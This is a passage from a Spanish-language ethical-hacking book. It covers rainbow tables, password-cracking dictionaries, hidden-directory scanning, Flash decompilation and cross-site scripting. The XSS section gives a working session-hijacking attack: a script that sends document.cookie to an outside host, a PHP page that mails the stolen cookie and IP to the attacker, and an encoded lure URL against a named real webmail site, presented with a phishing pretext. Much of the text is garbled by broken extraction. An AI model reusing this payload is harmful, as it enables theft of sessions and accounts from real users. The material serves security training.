8. El microprocesador en la técnica de fuerza bruta: La importancia del mi-cro es fundamental por su potencia debido a la cantidad de cálculos por segun-do que éste será capaz de realizar. Una tabla muy interesante sobre este tipo deprocesamiento existe en la página de MDCrack. Por ejemplo, una máquina conWindows XP Pro y micro 2x XEON 3.2GHz (DC + HT) realiza 42.299.451comprobaciones por segundo para descifrar un hash md5, contra las 5.080.455que hace una máquina con Windows XP y un micro Athlon 1.53 Ghz.

9. La herramienta utilizada en sí: Su algoritmo y funcionamiento (no compararLC5 con Ophcrack, por dar un ejemplo), el manejo de sockets, los tiempos derespuesta, entre otras tantas cosas. La programación por parte del pentester, en elcaso de escribir un script y utilizarlo localmente. Es muy posible que, para sacar-se una duda lo haya escrito rápido, sin elegancia o el mejor pulido código de pro-gramación.

10. La falta de entendimiento o de comprensión por parte del ejecutor: Pa-ra emplear esta técnica hay que saber dónde, cómo, con qué y durante cuán-to tiempo hacerlo. Hay que tener en cuenta las probabilidades, los factores,conocer características del objetivo y tener algunos conocimientos técnicosprevios y la diferencia entre tipos de hashes, cifrados y archivos (más adelan-te veremos cómo extraerlos), entre otros. Hay que tener bien en claro los em-pleos y la orientación de la FB.

Rainbow TablesLas tablas Rainbow son tablas binarias pregeneradas para ser utilizadas por progra-mas que, bajo una forma específica del concepto Time-Memory Trade-Off ligadoal criptanálisis, son empleadas para encontrar passwords con una alta performan-

128

En esta obra no encontraremos detalles de algoritmos de cifrado (debilidades puntua-les de éstos), de programación de bajo nivel (avanzada), de teorías cuánticas ni histo-ria o matemática pura. Para ello, es recomendable visitar el excelente sitio www.crip-tored.upm.es o los foros de www.kriptopolis.org.

Información adicional

Hacking Etico - [PDF Document] (132)

ce. Muchas veces lo hacen más rápido que un generador normal brute force tipoLC5, aunque se tarda bastante en generar estas tablas previamente. Además, sue-len ser muchos gigas, dependendiendo del charset elegido.El concepto lo mejoró Philippe Oechslin, ya que existe desde hace más de 20 añosgracias a Martin Hellman, y lo describe en detalle en el artículo publicado enlasecwww.epfl.ch/pub/lasec/doc/Oech03.pdf. En https://www.isc2.org/cgi-bin/content.cgi?page=738 detalla las rainbow tables y en www.objectif-securite.ch/research/websec06.pdf, las ecuaciones del algoritmo.

Instantáneo. Decryptum es un sitio que descifra un documentoWord en segundos. Para hacerlo, utiliza un mecanismo basado en

rainbow tables. Cualquier documento Word con password de open podráser descifrado y posteriormente abierto, más allá del password que haya tenido.

Los programas que se utilizan en la actualidad son muchos, pero los más comunes-nombradas antes- son el original Ophcrack (http://ophcrack.sourceforge.net, esmuy recomendable leer su Help para conocer algunos consejos), RainbowCrack(www.antsight.com/ zsl/rainbowcrack/) y Cain & Abel (www.oxid.it/cain.html).Estos programas pueden ser utilizados bajo Windows o Linux y sirven para atacarhashes bajo cifrados de diferentes tipos, como LM, md5, SHA1 y otros. Son real-mente rápidos, ya que tardan muy pocos segundos o minutos. Podemos encontraruna nota interesante en www.codinghorror.com/blog/archives/000949.html.Ahora bien, ¿cómo podemos obtener Rainbow Tables? Podemos generarlas (enwww.antsight.com/zsl/rainbowcrack/rtgen_cfg5.txt encontramos la lista de co-

129

Hacking Etico - [PDF Document] (133)

mandos para generar tablas rainbows sobre el charset [ABCDEFGHIJKLM-NOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] del programa Rainbow-crack; en este caso poco más de dos meses con un micro Pentium 4 de 2.8 Ghz),podemos bajarlas desde una red P2P o de sitios como http://rainbowtables.sh-moo.com, http://lasecwww.epfl.ch/SSTIC04-5k.zip, www.freerainbowtables-.com y www.thepiratebay.org/search/Rainbow%20Tables; podemos comprarlasen DVD en http://sarcaprj.wayreth.eu.org y www.objectif-securite.ch/ en/con-tact.php, o bajarlas desde algun cliente para torrents.

DiccionariosPor el año 2001, dí a los lectores de una lista de correo que por aquel entoncesmoderaba, un archivo que contenía palabras deniminado 510.000 passwordsusualmente utilizados en Argentina. Ese material todavía está disponible pa-ra descargar, con la diferencia de que en la actualidad, la cifra de palabras asciendea una cantidad de 7.414.572, una nada despreciable colección, que me ha ahorra-do mucho tiempo en las auditorias de passwords.Para obtenerlo, hay que descargarlo de www.hackingetico.com/diccionario.zip(gracias a www.mesi.com.ar -ISO 9001- por el hosting).El archivo posee clave y, para conocerla, hay que darse de alta en la lista:http://www.elistas.net/lista/nnl/alta , de ese modo les llegará automatica-mente un correo de bienvenida con dicha clave.

Este diccionario fue creado a través del tiempo coleccionando listados de palabras,generándolas o escribiéndolas a mano, tomándolas de grandes repositorios públi-cos, más otros archivos que han confeccionado colegas, allegados y anónimos. Haytambién claves comúnmente utilizadas de perfiles variados y un resto de palabrasproveniente de todo tipo de base de datos. El material se depuró con la aplicaciónTextPad, de Helios Software Solutions (www.textpad.com).

130

No hay dudas de las bondades de PGP como herramienta para cifrar nuestros archivosy correos. Aun así, si nuestros passwords son muy débiles, mediante fuerza bruta esposible descifrar esos archivos. Existen algunas herramientas, como las que podemosencontrar en www.elcomsoft. com/edpr.html y www.accessdata.com.

Herramientas FB

Hacking Etico - [PDF Document] (134)

Contenido del archivo

El fichero diccionario.zip, contiene un archivo de texto de 74 megas (dicciona-rio.txt) y un archivo .bat que cuando lo ejecutemos, generará lo siguiente:• Un diccionario.lst para utilizarlo con John the Ripper.• Un diccionario.dic para utilizarlo con LC5.• Un archivo diccionario sin extensión que podrá ser utilizado con aplicacionescomo Hydra u otros programas y sistemas operativos.

Auditor. Medusa (www.foofus.net/jmk/medusa/medusa.html)es otra aplicación para realizar brute force sobre servicios de un

servidor. Sus autores afirman que es más estable que Hydra, de THC.

Documentos técnicos

www.secuwiki.comhttp://his.sourceforge.net/trad/

http://akira.azul.googlepages.com/sabuesos.pdfhttp://blackhat.com/html/bh-multimedia-archives-index.html

www.security-freak.net

131

Hacking Etico - [PDF Document] (135)

132

www.packetstormsecurity.org

Éste es un repositorio continuamente actualizado sobre herramientas deseguridad, noticias de incidentes informáticos, textos, avisos, exploits,artículos y los más diversos archivos relacionados. Existe hace muchos años yes posible ver tanto herramientas o técnicas de hace algún tiempo como lasmás nuevas.

Hacking Etico - [PDF Document] (136)

5 > Aplic.Web

Descuidos y vulnerabilidades más

comunes ligadas a las aplicaciones

webs. Principalmente, aquellos que

nacen debido a una deficiente

programación, implementación,

administración del servidor o bien del

contexto en el que se encuentra la

aplicación. Se verán metodologías de

forma muy clara, detalles técnicos,

herramientas e imágenes interesantes.

Hacking Etico - [PDF Document] (137)

APLICACIONES ONLINEEn una internet cada día más orientada a brindar servicios al visitante de sitios web, esde esperar que un gran número de éstos tengan aplicaciones corriendo. Muy lejos esta-mos de los estáticos sitios html con letras Times New Roman que había en los años 90.Estas aplicaciones web hicieron que el desarrollo de un sitio interactivo, con basesde datos y diversos scripts, ya no sea obra de un diseñador o un usuario común, si-no de un programador con el soporte de un administrador o equipos de trabajo queparticipan en forma conjunta para su desarrollo y mantenimiento.Muchos de estos sitios tienen descuidos en programación y de administración, y nohablamos de blogs personales ni de aquellos sitios particulares en donde reina la es-tética (diseño a la vista) en un formato estático, sino de webs de organizaciones einstituciones que ya están, de alguna forma, en lo que es llamado Web 2.0 o red so-cial.Si estos sitios están vulnerables, de algún modo exponen información o datos. Co-mo una de las metas del hacking ético es encontrar esas brechas antes de que unatacante real lo haga, en nuestra tarea como profesionales éticos la clave es buscar,interpretar, analizar, generar errores y revisar de modo intensivo, hasta encontrar.No todo lo encontrado puede ser explotable, pero podría ser una muy buena pistapara dar con algo sensible, o bien, mejorar la seguridad. Veamos cuáles son algu-nos de estos descuidos genéricos y las técnicas de intrusión más comunes ligadas aellos.

Directorio. Penetration Testing directory project(www.penetrationtests.com) es un repositorio de direcciones

relacionadas al mercado del chequeo de la seguridad.

134

Hacking Etico - [PDF Document] (138)

Directorios y archivos ocultos

Un webmaster (sea programador, diseñador o administrador) encargado del sitio dela empresa puede dejar, aunque sea por unas noches, una carpeta en el host llama-da backup (www.sitioweb.com/backup). Es muy probable que un intruso la en-cuentre rápido, ya sea con escáneres o por Google, o quizá sea vista por un em-pleado del lugar, algo que sucede bastante a menudo.Los directorios que no están disponibles para el público son de mucho interés pa-ra el intruso ya que allí puede existir un atajo o material sensible para lograr una in-trusión, o bien, conseguir la meta (o parte) propuesta sobre el objetivo. Esos direc-torios pueden encontrarse de varias formas:

• A ciegas, con un escáner o script: un ejemplo es el de las herramientas quechequean los CGI files y paths (directorios) más comunes. Podemos ver una lis-ta de estas utilidades en www.blackhat.be/cst/big.db.

• Por lógica o deducción, alineando un escáner al objetivo o a mano: un sim-ple script escrito en Perl que se encargue de leer una lista de palabras selecciona-das según el tipo de objetivo para que, automáticamente, las vaya probando en elhost y diga qué path es coincidente con la palabra allí presente (recordemos lostips del Capítulo 2 –Escaneo y fingerprinting– sobre vulnerability scanning).

• Siguiendo el mapeo del sitio o los links, e intentando encontrar browsingdirectory en alguno de los paths que existen.

Hay utilidades que mapean el sitio o lo bajan completamente para que luego po-damos analizarlo offline con tranquilidad y así ver la totalidad de los links y la es-tructura misma del sitio, por ejemplo WebZIP (lo podemos encontrar en ladirección www.spidersoft.com/webzip/). Supongamos que el sitio tiene la aplica-ción instalada en www.sitioweb.com/clientes/stock/pedidos/carrito/com-pra. asp?id=61. A mano, trataremos de ver el contenido de:

• www.sitioweb.com/clientes/stock/pedidos/carrito/• www.sitioweb.com/clientes/stock/pedidos/

135

CGI (Common Gateway Interface) es una importante tecnología de la World Wide Web que per-

mite a un cliente (explorador web) solicitar datos de un programa ejecutado en un servidor web.

CGI especifica un estándar para transferir datos entre el cliente y el programa. Es un mecanis-

mo de comunicación entre el servidor web y una aplicación externa. Fuente: Wikipedia.

CGI

Hacking Etico - [PDF Document] (139)

• www.sitioweb.com/clientes/stock/• www.sitioweb.com/clientes/Recordemos que, haciendo la petición http de estas diversas maneras, podemos lle-gar a obtener diferentes resultados:

• www.sitioweb.com/clientes/• www.sitioweb.com/clientes• http://sitioweb.com/clientes/• http://sitioweb.com/clientes• https://sitioweb.com/clientes

Además, tengamos en cuenta que no es lo mismo poner un URL que dé error desistema en Firefox 2.0 que en Internet Explorer 7.0, instalado por defecto. En elprimero, se verá bien el error.

Mensaje. Error del gestor de databases mostrado a través del browser Firefox.

En cambio, en Internet Explorer sólo se verá el Status Code 500, correspondiente

136

Los famosos Status Code Definitions números 404, 403, 200 que aparecen luego de nuestras pe-

ticiones http están declarados y detallados en www.faqs.org/rfcs/rfc2616.html. Existen de cinco

clases: los del rango 100 son informativos, los del 200 son peticiones exitosas, los del 300 son re-

dirección, los del 400 son los de error del cliente y los del rango 500 son de errores del servidor.

Errores de estatus

Hacking Etico - [PDF Document] (140)

a un error de sistema, algo que no brinda demasiada información.

Error. Internet Explorer 7.0 no muestra el error del gestor de databases. Podemosactivarlo desde el menú HHee rrrraa mmiieenn ttaa ss//OOpp cciioo nneess ddee IInn tteerr nneett. Una vez allí, en OOpp cciioo nneessaavvaann zzaa ddaass, hay que des til dar la op ción MMooss ttrraarr mmeenn ssaa jjeess ddee eerrrroorr HHTTTTPP ddeess ccrriipp ttii vvooss.

• Vién do lo di rec ta men te gra cias a brow sing di rec tory: brow sing di rec tory es cuan -do po de mos ver el con te ni do de un di rec to rio on li ne. Es po si ble em pe zar con in -dex of / y mos trar la lis ta de ar chi vos u otras car pe tas que pue den te ner den tro.

Paths. El di rec tory brow sing ha bi li ta do per mi te ver el con te ni do de los di rec to rios,tan to car pe tas co mo ar chi vos y, por tan to, ac ce der a ellos o a la in for ma ción allí con te ni da,

137

Hacking Etico - [PDF Document] (141)

se gún el atri bu to que ten ga en los ar chi vos o en el len gua je que es té pro gra ma do.

• A tra vés del con te ni do de www .si tio web .com /ro bots.txt:Hay quie nes to man elre cau do de lis tar, en el ar chi vo ro bots.txt, los paths y di rec to rios que no quie re queGoo gle y otros bus ca do res in de xen a su mo tor de bús que da. Sin em bar go, no tie -nen en cuen ta que de es ta ma ne ra le es tán dan do in for ma ción fá cil a un po si ble in -tru so.

• A tra vés de al gu na in de xa ción del ti po Goo gle o al ma ce na mien to a mo dode mi rror (es pe jo), ca ché o du pli ca do de si tio.

• Des de el si tio de la em pre sa que de sa rro lló la apli ca ción: Es de cir, si se pue -de ba jar una de mo o la apli ca ción com ple ta, se pue de ins ta lar y ana li zar qué ti pode di rec to rios y ar chi vos po see la apli ca ción o có mo pue de ex plo tár se la. Es taprác ti ca se sue le de no mi nar clo na do de con tex to e im pli ca con se guir la mis maapli ca ción e ins ta lar la en el mis mo sis te ma ope ra ti vo pa ra ver có mo es su ad mi -nis tra ción, sus paths y sus ar chi vos, su es que ma de se gu ri dad (có mo se lo guea elad min, có mo se guar dan sus pass words, có mo y dón de se ac tua li za, có mo se par -chea, ar chi vos por de fec to en ins ta la ción, et cé te ra). An tes de ha cer to do eso, con -vie ne leer el ma nual de usua rio o un da tas heet de es pe ci fi ca cio nes téc ni cas, ya queel in tru so has ta pue de tra tar de ana li zar la en otro si tio que uti li za la mis ma apli -ca ción, pe ro con me nos me di das de se gu ri dad de en tor no apli ca das.

Los ar chi vos en es tos di rec to rios pue den con te ner con fi gu ra cio nes, bac kups de to -do ti po, scripts con las más di ver sas fun cio nes (upload.php o uploa d.asp pa ra su -bir ar chi vos al ser ver, en tre otros).Tam bién se lo lla ma Di rect Ac cess o Di rect Re quest cuan do se ac ce de di rec ta -men te a un path o a un ar chi vo de la apli ca ción in se gu ra. Mu chas apli ca cio nes dee-com mer ce tu vie ron la fa lla de que, al lla mar di rec ta men te a su da ta ba se de clien -tes, és ta po día ser ba ja da sin pro ble mas.

En www .pac kets torm se cu rit y.or g/U NIX/c gi-scan ners /Webr00t.pl, po de -mos en con trar una uti li dad que bus ca se cuen cial men te di rec to rios y ar chi vos de si -tios y tie ne va rios años (es tá es cri ta en Perl). Es útil pa ra fa mi lia ri zar se con es te ti -

138

Pa ra los usua rios de Win dows, 7-Zip es una apli ca ción que permite ma ni pu lar ar chi vos com pri -

mi dos en mu chas ex ten sio nes (gz, tar.gz, tar, zip, rar) y con ma yor per for man ce que los com pre -

so res y de com pre so res más usua les. El si tio de es ta apli ca ción es www.7-zi p.or g/es/.

Ar chi vos com pri mi dos

Hacking Etico - [PDF Document] (142)

po de he rra mien tas de lí nea de co man dos al ta men te cus to mi za bles (adap ta ble tan -to en fun cio na mien to co mo en lo que bus ca). Una bue na idea es ver si po de mosme jo rar la, agre gar le pa la bras re la cio na das con ob je ti vo del ti po. Por ejem plo:

/pro yec tos/ /in tra net/ /car los/ /eduar do/ /im por tan te//clien tes/ /mar tin/ /po li ti cas/ /ac ce so/ /bkp//lis ta dos/ /da ta ba ses/ /da tos/ /cuen tas/ /co rreos//pri va do/ /ar chi vos/ /do cu men tos/ /da ta/ /juan//bac kup/ /res pal do/ /ser vi dor/ /in clu des/ /app/ /ge ren te/ /web mas ter/ /pla nea mien to/ /gus ta vo/ /con fig//usua rios/ /ad min/ /es tra te gia/ /con fi den cial/ /asp//vie jo/ /pa nel/ /docs/ /in ter no/ /web//bo rrar/ /mails/ /gra bar/ /me mos/ /sour ce//in gre so/ /db/ /se cre to/ /co pia/ /nom bre ad min/

¿Có mo la eje cu ta mos en Win dows? Muy fá cil. Ins ta la mos un in tér pre te de Perlco mo Ac ti ve Perl, que podemos descargar desde la dirección ww w.ac ti ves ta te.com/s to re/ac ti ve perl /down load/. Allí bas ta con ha cer click en Con ti nue sinlle nar los cam pos pa ra ba jar la ver sión que de see mos.Lue go de ins ta lar Perl, de ja mos el es cá ner en C:\Perl \bin y eje cu ta mos CM D.e -xe en Win dows. Una vez que estamos en el prompt MS-DOS, nos movemos has -ta ese path y lo eje cu ta mos de la si guien te ma ne ra:

C:\Perl \bin >perl Webr00t.pl -h www .web si te .com -o re sul ta do.txt

Ok he re we go ...Host: www .web si te .comOut put: re sul ta do.txtVer bo se: OFFAu dio: OFFIn te rac ti ve: OFFUsing: Di rec tory Dis co veryStart Dir: /

Sear ching for di rec to ries ...1 : / => 200 OK2 : etc

Si de sea mos al go mu cho más rá pi do y nue vo, po de mos uti li zar el mó du lo de Acu -ne tix (ww w.a cu ne tix .com). Otra he rra mien ta muy bue na pa ra ha cer lo es nik to

139

Hacking Etico - [PDF Document] (143)

(www .cirt .net /co de /nik to.shtml) o tam bién po de mos pro gra mar un script pro pio.Es te ejem plo es pa ra aque llos que re cién es tán em pe zan do.

Nikto. Pan ta lla de la shell en don de se tes tea Nik to 2.0(so bre FreeBSD 5.5). Aquí se ter mi na de ha cer un che queo de di rec to rios,ar chi vos CGI y otros sen si bles de ca si 3000 ítems en me nos de 7 mi nu tos.

In ge nie ría in ver sa so bre Flash

Co mo cla ro ejem plo de in ge nie ría in ver sa (de sar mar y ana li zar pa ra ver có mo es táhe cho o có mo fun cio na), la lle va re mos a ca bo so bre una de las tec no lo gías más uti -li za das en si tios webs di ná mi cos. Un archivo de Adobe Flash es fá cil de des com pi lar si contamos con la he rra mien -ta ade cua da, y así ve re mos có mo con se guir in for ma ción sen si ble de un si tio me -

140

Si que re mos te ner más al ter na ti vas, po de mos pro bar un es cá ner on li ne de los linksque con tie ne un si tio. Pa ra eso, en ww w.el sop .com /quick/ en con tra re mos LinkS can -/Quick Check. Además, podemos descargar una versión de prueba del programa.

Es cá ner en lí nea

Hacking Etico - [PDF Document] (144)

dian te es ta téc ni ca li ga da al in for ma tion gat he ring. Es muy co mún que las or ga ni -za cio nes e ins ti tu cio nes uti li cen pe lí cu las o par tes de su si tio en Flash, por ejem ploen me nús, pre sen ta cio nes, for mu la rios, ac ce sos y links se mies tá ti cos.

LoginID. Clá si co y arries ga do ac ce so de va li da ciónen Flash pa ra la com pro ba ción de usua rio y pass word.

Hay mu cho más que es té ti ca 3D o mó vil de trás de esas ani ma cio nes. Des com pi -lan do es te ti po de ar chi vos de ex ten sión .swf (ap pli ca tion/x-shock wa ve-flash com -pi la do y com pri mi do) podemos encontrar datos como los siguientes:

• Links ocul tos• Ca si llas de co rreo• Usua rios • Cla ves• Ar chi vos ocultos• Di rec to rios ocul tos• Nom bres• Va ria bles• Comentarios de código con información personal• Otro ti po de in for ma ción re la cio na da con el ob je ti vo, que nos pue de lle gar a ser -vir.

Pa ra es tos dos ejem plos que ve re mos a con ti nua ción, usa re mos SWF De com pi ler dela em pre sa Sot hink. Es te ti po de soft wa re se creó, en un prin ci pio, pa ra vol ver las ani -ma cio nes (.swf) a un for ma to edi ta ble (.fla). Po de mos tes tear el soft wa re des de www. sot hink .com /pro duct /flash de com pi le r/in dex.htm.

141

Hacking Etico - [PDF Document] (145)

Una vez ins ta la do el pro gra ma, en tra mos en la web que con tie ne la pe lí cu la Flash queque re mos des com pi lar y la guar da mos en Fi re fox en tran do en el ítem del me nú Ar -chi vo y lue go en Guar dar co mo...

Validando. El ar chi vo Flash ha ce la com pro ba ción de los da tos in tro du ci dos y,si son in co rrec tos, nos de vuel ve a la mis ma pá gi na sin error o car tel al gu no.

Entonces, para continuar, abri mos el ar chi vo lo gin.swf que des car ga mos a nues -tra má qui na con el SWF De com pi ler.

142

Hacking Etico - [PDF Document] (146)

Inversa. In ter faz grá fi ca del des com pi la dor. Au to má ti ca men te, en el me núde la de re cha, apa re cen to das las sec cio nes del ar chi vo ya des com pi la do.

Lo que nos in te re sa a no so tros es aque llo que se en cuen tra en la sec ción Ac tion, yaque allí es tán de cla ra das, en el có di go fuen te, las ac cio nes que rea li za el ar chi voFlash con la in for ma ción que se le brin da.

Source. El có di go fuen te de la pe lí cu la Flash del ac ce so mues tra los links in ter nos delsi tio con sus res pec ti vas cla ves de ac ce so y usua rios asig na dos a ca da una de las di rec cio nes.

Ló gi ca men te, no to dos los ar chi vos .swf en tre gan tan ta in for ma ción. A ve ces, sue lendar links in ter nos so la men te, y es tá en no so tros en con trar le o sa car le pro ve cho con:

• Sub mits vía POST.

143

Una coo kie es in for ma ción que guar da una pá gi na en nues tro dis co. Así, cuan do abri mos una se -

sión de nues tra ca si lla de co rreo, no te ne mos que po ner en ca da pá gi na nues tro usua rio y cla ve

por que ya se en cuen tran en la coo kie y el ser vi dor los re cu pe ra en ca da pe ti ción. Si un in tru so

ro ba nues tra coo kie y la usa rá pi do, po dría en trar en nues tra ca si lla aun sin sa ber la pass word.

¿Qué es una coo kie?

Hacking Etico - [PDF Document] (147)

• Ge ne ran do erro res.• Ha cien do com pro ba cio nes de da tos de de ter mi na das va ria bles au to ma ti za das(com pro ba ción de usua rios de sis te ma exis ten tes, por ejem plo).

In tru sos osa dos pue den lle gar a ha cer se pa sar por los di se ña do res o ad mi nis tra do -res (sa bien do ese ti po de da tos no pú bli cos) pa ra ob te ner cla ves FTP o Shell de sis -te ma.Vea mos el se gun do ejem plo. És te es el có di go fuen te de otro si tio que, al de cla rarla fun ción iden ti fi car se(), de ja ver el link en don de se com prue ba ese lo gin (www -. si tio web .co m/a pli ca cio n/I den ti fi car se.php). Si las fun cio nes son va ria das, nos da -rá bas tan tes URLs in ter nos co mo pa ra ana li zar, en tre otros da tos.

—8<

func tion iden ti fi car se(){

var iden = new Load Vars();ide n.u su = _roo t.U sua rio;iden .con = _root .Con tra se ña;iden .sen dAnd Loa d(“I den ti fi car se.php”, iden, “POST”);ide n.on Load = func tion (){

if (ide n.Au to ri za do == “si”){

ide n.Au to ri za do = “no”;_roo t.en tran do jue go();

}el se{

_roo t.en tra da no va li da();} // end if

};

144

Em pre sas co mo Tip ping Point, iDe fen se, Im mu nity y Ne tra gard com pran ex ploits 0day a los pro -

gra ma do res y los man tie nen en pri va do. Si nos in te re sa de sa rro llar es te ti po de pro gra mas,

podemos leer A Buf fer Over flow Study - At tacks & De fen ses, In tro duc tion to Shell co de - How

to ex ploit buf fer over flows y Wri ting Se cu rity Tools and Ex ploits, entre otros libros.

Com pra de ex ploits Oday

Hacking Etico - [PDF Document] (148)

} // End of the func tion—8<

De jar de re co men dar la uti li za ción de Flash por el ries go de ser víc ti ma de es te ti -po de aná li sis es muy ex tre mo, ya que exis ten so lu cio nes, co mo Ama ye ta SWFEncrypt, pa ra mi ti gar el pro ble ma (ww w.a ma ye ta .com /soft wa re/sw fencrypt/).

XSS O CROSS-SI TE SCRIP TINGSe de no mi na XSS a la téc ni ca que per mi te in yec tar có di go (tags) HTML o ja vas -cript, por ejem plo, en una apli ca ción o sis te ma en el que no se es té co rrec ta men teva li da do pa ra po der así eje cu tar se. Vea mos un cla ro ejem plo grá fi co:

XSS. Aquí ve mos có mo se eje cu ta, en nues tro ex plo ra dor Fi re fox sin noS cript,la por ción de có di go “<scrip t>a lert(“[XSS]”)</s cript>” agre ga do al URL

del bus ca dor del si tio del dia rio Cla rín.

Aun que el car tel que se mues tra pa re ce ino fen si vo, la téc ni ca en sí no lo es. Lo quehi ci mos fue só lo una com pro ba ción de la vul ne ra bi li dad del si tio an te es ta téc ni ca,que pue de uti li zar se pa ra realizar actividades como:

• Ro bar coo kies y, de ese mo do, se sio nes o lo equi va len te a en trar en una ca si lla de Hot -mail, o cual quie ra que uti li ce el me ca nis mo coo kies de se sión, sin co no cer la cla ve.

145

Hacking Etico - [PDF Document] (149)

• Usar al vi si tan te co mo proxy pa ra al gún ata que vía http re mo to.• Ro bar nombres de usua rios y sus con tra se ñas a tra vés de for mu la rios di se ña doses pe cial men te por el in tru so.

• Re di rec cio nar au to má ti ca men te o ha cer que el brow ser del vi si tan te rea li ce al gu -nos com por ta mien tos que quie re el in tru so/e je cu tor.

• Ob te ner el pass word del ad mi nis tra dor de fo ros y si tios vul ne ra bles.• Rea li zar phis hing, frau des on li ne y es ca la das en in tru sio nes de al ta com ple ji dad.Vea mos aho ra un ejem plo sim ple de ses sion hi jac king (a tra vés de la ex trac ción decoo kies, es ta ble cer una se sión en una ca si lla de co rreo co mo si fué ra mos la víc ti -ma). Es te ejem plo tam bién fun cio na ba en Hot mail has ta que, ha ce unos me ses, lagen te de Mi cro soft mu dó ca si la to ta li dad de las ca si llas a Win dows Li ve y ya no espo si ble re pro du cir lo co mo an tes. Si bien se pue den aún to mar las coo kies de una se sión en Hot mail (MSN tie ne mu -chos si tios vul ne ra bles a XSS), en la ac tua li dad só lo fun cio na en aque llas que no sehan pa sa do a la nue va tec no lo gía (ca si llas Hot mail abier tas ha ce mu chos años) conotros mé to dos de se gu ri dad y com pro ba cio nes apli ca dos.

¿Qué ne ce si ta mos pa ra el ejem plo? Su pon ga mos que de ci di mos com pro bar la se -gu ri dad de una de ter mi na da ca si lla de ww w.ub bi .com, que per te ne ce a un ge ren tede sis te mas ya que es ta mos con tra ta dos en un pro yec to de se gu ri dad. Un pun to porcom pro bar es ver de qué mo do im pac ta la in ge nie ría so cial den tro de la or ga ni za -ción. Pre via men te, de tec ta mos que a la ca si lla tam bién la uti li za pa ra cues tio nes detra ba jo pa ra no usar el e-mail in ter no de la em pre sa.

En ton ces, lo pri me ro que ne ce si ta mos es en con trar una vul ne ra bi li dad XSS en eldo mi nio del web mail, do mi nio que es ta rá li ga do a la coo kie en cues tión.

146

Hacking Etico - [PDF Document] (150)

Doc. Google hace poco sufrió la falla XSS. Miren el interesante detalle en:http://xs-sniper.com/blog/2008/04/14/google-xss/

En tra mos en el si tio y va mos pro ban do, den tro del do mi nio ub bi .com, la eje cu ciónde “><scrip t>a lert(“[XSS]”)</s cript>”. Lo en con tra mos en el URL:http ://se cu re.ub bi .com /re gis tra cion /Re cu pe ro _Pas s.asp?srv=3”><s crip -t>a lert(“[XSS]”)</script>.

XSS2. Com pro ba ción de la vul ne ra bi li dad XSS en el do mi nio en cues tión.

Una vez com pro ba da la vul ne ra bi li dad, podemos continuar con el pa so si guien -

147

Hay una he rra mien ta gra tui ta pa ra buscar XSS en ww w.a cu ne tix .com /vul ne ra bi lity-scan ner/

vul ne ra bi litys can ne r5.e xe y en ww w.a cu ne tix .com /vul ne ra bi lity-scan ner/wvs 5ma nual.pdf su

ma nual. Si que re mos aho rrar tiem po con au to ma ti za cio nes, po de mos ha cer lo, pe ro se nos pue -

de pa sar por al to al go im por tan te. Re cor de mos que es más efi cien te bus car los a ma no.

Bus car XSS

Hacking Etico - [PDF Document] (151)

te. En un si tio con tro la do por no so tros y que, vía PHP, pue da en viar co rreoselec tró ni cos (pa ra en viar nos la coo kie de la vic ti ma a Ou tlook y que cuan do lle -gue és te nos dé un so ni do de avi so), te ne mos que su bir una car pe ta (en es te ejem -plo lla ma da harry) con los si guien tes ar chi vos:

Nom bre: item.jsCó di go fuen te:

lo ca tion.h ref=’http://www .su si tio .com /harry /log.ph p?i te m=’+es ca pe (do cu ment .cookie)

Nom bre: log.phpCó di go fuen te:

<?$coo kie = $_GE T[‘i tem’];$ip = ge tenv (“RE MO TE_ADDR”);$Ti me = da te(“l dS of F Y h:i:s A”);

$msg = “Coo kie: $coo kie\n Di rec cion IP: $ip \Ti me: $Ti me”;$sub ject = “coo kie”;mail (“don de-lle ga-la-coo kie@g mail .com”, $sub ject, $msg);

hea der (“lo ca tion: http://ww w.ub bi .com/sms /ba ses _harr y.asp”);?>

Una vez que es té la car pe ta con los ar chi vos allí, va mos a pre pa rar el URL pa ra pa sar -le a la víc ti ma (con el pre tex to de que es un con cur so pa ra su so bri ni to fa ná ti co deHarry Pot ter) a su co rreo ub bi .com. Cuan do se ha ga clic en esa URL, ocu rri rá lo si -guien te:

• Vía e-mail se nos en via rá la coo kie de se sión con la di rec ción IP, fe cha y ho ra.• Ac to se gui do, se lo re di ri gi rá au to má ti ca men te a la pá gi na que le pe di mos que en tre.

El URL por en viar que da rá así:http ://se cu re.ub bi .com /re gis tra cion /Re cu pe ro _Pas s.asp?srv=3”><s criptsrc=http://www .si tio deuds .com /harr y/i tem.js>”Pa ra que la su pues ta víc ti ma no sos pe che del si tio ra ro, va mos a co di fi car lo un po -

148

Hacking Etico - [PDF Document] (152)

co con morf v0.3. El re sul ta do es el si guien te:http ://se cu re.ub bi .com /re gis tra cion/%52%65%63%75%70%65%72%6F %5F%5 0%6 1%7 3%7 3%2E%6 1%7 3%7 0%3F %7 3%7 2%7 6%3D%33%22%3E%3C %7 3%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F %2F%77%77%77%2E%73%69%74%69%6F%64%65%75%64%73%2E%63%6F%6D%2F%68%61%72%72%79%2F %69%74%65%6D%2E%6A%73%3E%22

A es te (bur do) URL de ejem plo, lo in clui mos en un e-mail con fec cio na do enHTML y se lo en via mos a su ca si lla de www.ub bi .com.A lo su mo, la víc ti ma pen sa rá que es un en ga ño del ti po phis hing, pe ro la coo kienos se rá en via da vía e-mail al dar tan so lo un click.

149

Hay mu chos si tios que ha blan de Ex ploits Hot mail o co sas si mi la res, pe ro na da másale ja do de es tos ex ploits de los que ha bla mos aquí. Esos si tios son, sim ple men te, pla -ta for mas de phis hing que se apro ve chan de la ig no ran cia de las per so nas pa ra ro bar -le sus pass words y su di ne ro.

No es lo mis mo

Hacking Etico - [PDF Document] (153)

Ubbi. Aquí es tá la ima gen del ar chi vo en HTML lin kea do(y edi ta do) al URL pre pa ra do con XSS pa ra ex traer le la coo kie de se sión.

Lue go que la víctima hace click en el link que preparamos, au to má ti ca men te se eje -cu ta el XSS en su má qui na ex tra yen do la in for ma ción de su coo kie (se sión en Ub -bi) y es re di ri gi do hacia las ba ses rea les del con cur so de Harry Pot ter (en ww w. ub -bi .com/sms /ba ses _harr y.asp).

Mien tras esta lee las ba ses del con cur so, a no so tros nos lle ga la in for ma ción de lacoo kie a tra vés del cliente de correo Ou tlook Express, -enviada por el servidor endonde tenemos alojados los scripts PHP- de modo totalmente silencioso.

Mail. Aquí ve mos la in for ma ción tal co mo lle góa nues tro co rreo lue go de que la víc ti ma hi zo un click en el link.

